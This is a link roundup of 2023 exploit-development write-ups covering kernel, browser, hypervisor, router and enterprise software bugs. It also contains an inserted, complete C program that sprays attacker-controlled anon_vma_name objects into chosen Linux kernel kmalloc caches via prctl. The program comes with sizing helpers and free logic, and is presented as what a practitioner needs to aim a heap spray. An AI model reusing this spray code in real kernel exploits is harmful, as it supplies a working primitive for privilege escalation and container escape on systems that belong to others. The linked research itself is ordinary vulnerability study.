Exploit Development
- Pixel GPU Exploit: a kernel exploit for Pixel 7/8 Pro with Android 14 (github.com, 0x36/Pixel_GPU_Exploit)
- Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991 (qriousec.github.io)
Introduction. Hi, I am Trung (xikhud). Last month, I joined the Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at Pwn2Own Vancouver 2023 to escape the VirtualBox VM. Since VirtualBox is open-source software, I can just downloa...
- From Terminal Output to Arbitrary Remote Code Execution (blog.solidsnail.com)
It was the year of the Linux desktop 1978. Old yellowed computers were not yet old, nor yellowed. Digital Equipment Corporation released the first popular terminal to support a standardized in-band encoding for control functions, the VT100.
cross-posted from: https://infosec.pub/post/2466014
> This is my first write-up, on a vulnerability I discovered in iTerm2 (RCE). Would love to hear opinions on this. I tried to make the writing engaging.
- No More Speculation: Exploiting CPU Side-Channels for Real (bughunters.google.com)
CPU vulnerabilities are a widespread problem, yet they are not well understood and are generally hard to mitigate. Some of these vulnerabilities affect nearly all modern processors, regardless of running software. This blog explores their impact on real-life systems.
- iOS 17: New Version, New Acronyms (www.df-f.com, Dataflow Forensics)
Our goal at DFF is to reveal any threats on mobile devices, and that requires us to keep up to date with every single version of Android and iOS, including the beta and "Developer Preview" phases. Often, these are the under-the-hood, undocumented changes which have the real impact on opera
- [Chrome] CVE-2023-2033 (github.com, mistymntncop/CVE-2023-2033)
- Exploiting a Flaw in Bitmap Handling in Windows User-Mode Printer Drivers (www.zerodayinitiative.com)
In this guest blog from researcher Marcin Wiązowski, he details CVE-2023-21822 – a Use-After-Free (UAF) in win32kfull that could lead to a privilege escalation. The bug was reported through the ZDI program and later patched by Microsoft. Marcin has graciously provided this detailed write-up of
- An Introduction to Exploit Reliability (blog.isosceles.com)
Earlier this year I was invited to give a talk at University of California San Diego (UCSD) for Nadia Heninger's CSE 127 ("Intro to Computer Security"). I chose to talk about modern exploit development, stepping through the process of finding and exploiting some of the memory corruption bugs that th...
- MSMQ QueueJumper (RCE Vulnerability): An In-Depth Technical Analysis (securityintelligence.com)
Unpack the remote code execution vulnerability impacting the Microsoft Message Queueing service — CVE-2023-21554, a.k.a. QueueJumper.
- Summary: MTE As Implemented (googleprojectzero.blogspot.com)
By Mark Brand, Project Zero. In mid-2022, Project Zero was provided with access to pre-production hardware implementing the ARM MTE specifi...
- CVE-2023-3389 - Exploiting a vulnerability in the io_uring subsystem of the Linux kernel (qyn.app, "CVE-2023-3389 - LinkedPoll")
- Escaping the Google kCTF Container with a Data-Only Exploit (h0mbre.github.io)
Introduction. I've been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall, and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_uring has be...
- The Legacy of Stagefright (blog.isosceles.com)
Introduction. Every so often a piece of security research will generate a level of excitement and buzz that's palpable. Dan Kaminsky's DNS bug, Barnaby Jack's ATM Jackpotting, Chris Valasek and Charlie Miller's Jeep hacking escapades. There's something special about the overheard conversations, the ...
- prctl anon_vma_name: An Amusing Linux Kernel Heap Spray (starlabs.sg)
TL;DR: prctl PR_SET_VMA (PR_SET_VMA_ANON_NAME) can be used as a (possibly new!) heap spray method targeting the kmalloc-8 to kmalloc-96 caches. The sprayed object, anon_vma_name, is dynamically sized by the caller-supplied name and can range from larger than 4 bytes to a maximum of 84 bytes. The object can be easily allocated a...
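The spray primitive described in that TL;DR, written out as an added example (this is not code from the starlabs.sg write-up or from the kernel). It assumes a Linux 5.17+ kernel with CONFIG_ANON_VMA_NAME, that struct anon_vma_name is a 4-byte kref followed by the NUL-terminated name (so an object is 4 + strlen + 1 bytes, 84 bytes at the kernel's 79-character limit), and the default x86-64 generic kmalloc cache sizes. Each prctl() call names one private anonymous page with a unique name, so every call leaves exactly one attacker-sized object allocated for as long as the mapping lives; the helper functions that map a name length to its kmalloc cache are the part a practitioner actually needs when aiming the spray at a specific slab.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <unistd.h>

/* Values from <linux/prctl.h>; repeated here so the example builds against older headers. */
#ifndef PR_SET_VMA
#define PR_SET_VMA 0x53564d41
#endif
#ifndef PR_SET_VMA_ANON_NAME
#define PR_SET_VMA_ANON_NAME 0
#endif

/* The kernel copies the name with strndup_user(uname, 80), so strlen(name) must be < 80. */
#define ANON_VMA_NAME_MAX_LEN 80
/* Assumption: struct anon_vma_name = 4-byte kref (refcount) + char name[] (NUL-terminated). */
#define ANON_VMA_NAME_HDR 4

/* kmalloc size the kernel requests for an anon_vma_name whose name has strlen name_len. */
size_t anon_vma_name_obj_size(size_t name_len)
{
    return ANON_VMA_NAME_HDR + name_len + 1;
}

/* Generic kmalloc-N cache an allocation of sz bytes lands in (default x86-64 sizes; assumption). */
size_t kmalloc_cache_for(size_t sz)
{
    static const size_t caches[] = { 8, 16, 32, 64, 96, 128, 192, 256 };
    for (size_t i = 0; i < sizeof caches / sizeof caches[0]; i++)
        if (sz <= caches[i])
            return caches[i];
    return 0; /* beyond the reach of this spray (max object is 84 bytes anyway) */
}

/* Longest name whose object exactly fills a slot of the given cache. */
size_t name_len_for_cache(size_t cache)
{
    return cache - ANON_VMA_NAME_HDR - 1;
}

/* Build a name of exactly name_len characters that passes the kernel's is_valid_name_char()
 * filter (printable ASCII, none of \ ` $ [ ]) and is unique per idx, so adjacent VMAs
 * carrying the same name are never merged back into one VMA (and therefore one object).
 * Returns -1 if the decimal idx does not fit in name_len characters. */
int build_name(char *buf, size_t name_len, unsigned idx)
{
    char prefix[16];
    int n = snprintf(prefix, sizeof prefix, "%u", idx);
    if (n < 0 || (size_t)n > name_len)
        return -1;
    memset(buf, 'A', name_len);        /* filler bytes: fully attacker-controlled content */
    memcpy(buf, prefix, (size_t)n);    /* unique prefix per object */
    buf[name_len] = '\0';
    return 0;
}

/* Spray `count` anon_vma_name objects with strlen name_len: one private anonymous page
 * per object, each named by its own prctl() call. anon_vma_name_alloc() kmallocs the
 * object and the VMA keeps the only reference, so the objects stay allocated until the
 * mapping is unmapped. *base_out receives the mapping so the caller can munmap() it and
 * free every sprayed object at once.
 * Returns the number of objects sprayed; 0 if the very first prctl() fails (kernel
 * without CONFIG_ANON_VMA_NAME / pre-5.17, or a sandbox blocking the call); -1 otherwise. */
long spray_anon_vma_name(size_t count, size_t name_len, void **base_out)
{
    long page = sysconf(_SC_PAGESIZE);
    char name[ANON_VMA_NAME_MAX_LEN];
    void *base;

    if (base_out)
        *base_out = NULL;
    if (page <= 0 || count == 0 || name_len == 0 || name_len >= ANON_VMA_NAME_MAX_LEN)
        return -1;
    base = mmap(NULL, count * (size_t)page, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -1;

    for (size_t i = 0; i < count; i++) {
        unsigned long start = (unsigned long)base + i * (size_t)page;
        if (build_name(name, name_len, (unsigned)i) < 0 ||
            prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, start, (unsigned long)page,
                  (unsigned long)name) != 0) {
            munmap(base, count * (size_t)page);
            return (i == 0) ? 0 : -1;
        }
    }
    if (base_out)
        *base_out = base;
    return (long)count;
}

int main(void)
{
    void *base = NULL;
    size_t len = name_len_for_cache(64);   /* 59-character name -> 64-byte object -> kmalloc-64 */
    long n = spray_anon_vma_name(256, len, &base);

    printf("name strlen %zu -> object %zu bytes -> kmalloc-%zu\n",
           len, anon_vma_name_obj_size(len), kmalloc_cache_for(anon_vma_name_obj_size(len)));
    printf("sprayed %ld objects\n", n);
    if (base)
        munmap(base, 256 * (size_t)sysconf(_SC_PAGESIZE));   /* frees all 256 objects at once */
    return 0;
}
```

Everything after the 4-byte refcount is bytes the caller chose, which is what makes the object useful as spray material rather than just a size-controllable allocation; the refcount itself is set to 1 by the kernel. Unmapping the pages (or naming them again with a different string) drops the last reference and frees the objects, so the same mapping gives both the allocate and the free side of a spray. The object count is bounded by vm.max_map_count, since each named page is its own VMA.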
- CVE-2023-35086 PoC: ASUS routers format string vulnerability, DoS only (github.com, tin-z/CVE-2023-35086-POC)
- A new method for container escape using file-based DirtyCred (starlabs.sg)
Recently, I was trying out various exploitation techniques against a Linux kernel vulnerability, CVE-2022-3910. After successfully writing an exploit which made use of DirtyCred to gain local privilege escalation, my mentor Billy asked me if it was possible to tweak my code to facilitate a container...
- Exploiting MikroTik RouterOS Hardware with CVE-2023-30799 (vulncheck.com)
VulnCheck develops an exploit that gets a root shell on MikroTik RouterOS.
- Shifting boundaries: Exploiting an Integer Overflow in Apple Safari (blog.exodusintel.com, Exodus Intelligence)
By Vignesh Rao. Overview: In this blog post, we describe a method to exploit an integer overflow in Apple WebKit due to a vulnerability resulting from incorrect range computations when optimizing JavaScript code. This research was conducted along with Martin Saar in 2020. We show how to convert this i...
- CVE-2023-36934: Progress Software MOVEit Transfer SQL Injection Remote Code Execution Vulnerability (www.zerodayinitiative.com, Zero Day Initiative)
In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Lucas Miller of the Trend Micro Research Team detail a recently patched remote code execution vulnerability in Progress MOVEit Transfer. This bug was originally discovered by Trend Micro Vulnerabi
- TheHole New World - how a small leak will sink a great browser (CVE-2021-38003) (starlabs.sg)
Introduction. CVE-2021-38003 is a vulnerability in the V8 JavaScript engine. It affects Chrome before stable version 95.0.4638.69 and was disclosed in October 2021 in Google's Chrome release blog, while the bug report was made public in February 2022. The vulne...
- V8 Sandbox - Code Pointer Sandboxing (docs.google.com)
Author: saelo@. First published: December 2022; last updated: July 2023; status: living doc; visibility: public. This document is part of the V8 Sandbox project and discusses the design of code pointer sandboxing to ensure secure control-flow transfers into and ...
- CVE-2023-38408: Remote Code Execution in OpenSSH's forwarded ssh-agent (blog.qualys.com, Qualys Security Blog)
The Qualys Threat Research Unit (TRU) has discovered a remote code execution vulnerability in OpenSSH's forwarded ssh-agent. This vulnerability allows a remote attacker to potentially execute…